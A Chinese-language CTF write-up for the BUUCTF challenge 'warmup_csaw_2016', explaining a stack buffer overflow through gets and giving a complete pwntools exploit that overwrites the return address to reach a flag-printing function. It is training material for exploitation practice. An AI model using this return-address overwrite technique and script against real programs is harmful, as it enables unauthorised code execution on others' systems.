3.[BUU]warmup_csaw_20161

1.checksec 检查文件类型

ELF-64-little ,无其他限权,直接用ida检查代码。

2.IDA进行反编译,进行代码审计

查看各个名称的内容:

了解基本攻击思路:

攻击思路:gets输入垃圾数据覆盖v5内容,再将sub_40060D的地址覆盖return_addr,使其调用“system”函数,执行“cat flag.txt”,输出flag,进而得到flag。

v5距离ebp大小:

ebp大小:

3.EXP

from pwn import *
io = remote('node4.buuoj.cn',27089)
context(os='linux', arch='amd64', log_level='debug')

getshell=0x40060D
payload=b'a'*(0x40+0x8)+p64(getshell)

io.sendline(payload)

io.interactive()

因为flag是我们接收的数据,所以不用交互进行cat flag.直接在返回字符内容里面查看

相关推荐

  1. HDOJ 2061

    2023-12-23 13:32:02       18 阅读
  2. [HITCON 2016]Leaking

    2023-12-23 13:32:02       20 阅读
  3. MATLAB 2016计算NDVI

    2023-12-23 13:32:02       17 阅读

最近更新

  1. TCP协议是安全的吗?

    2023-12-23 13:32:02       19 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2023-12-23 13:32:02       19 阅读
  3. 【Python教程】压缩PDF文件大小

    2023-12-23 13:32:02       20 阅读
  4. 通过文章id递归查询所有评论(xml)

    2023-12-23 13:32:02       20 阅读

热门阅读

  1. 各大高校科研工具链培训PPT汇总

    2023-12-23 13:32:02       40 阅读
  2. 嵌入式中的定时器概念

    2023-12-23 13:32:02       50 阅读
  3. 黑苹果安装经验总结2023-12

    2023-12-23 13:32:02       49 阅读
  4. webpack之介绍

    2023-12-23 13:32:02       38 阅读
  5. cmakelists.txt中install函数/命令

    2023-12-23 13:32:02       39 阅读
  6. Unity几种移动方式

    2023-12-23 13:32:02       38 阅读
  7. 记录 | ranger修改默认文本编辑器为vim

    2023-12-23 13:32:02       43 阅读
  8. docker的应用和定义

    2023-12-23 13:32:02       32 阅读
  9. centos7 nginx搭建本地yum仓库

    2023-12-23 13:32:02       38 阅读
  10. 4.5 基于范围的for循环

    2023-12-23 13:32:02       36 阅读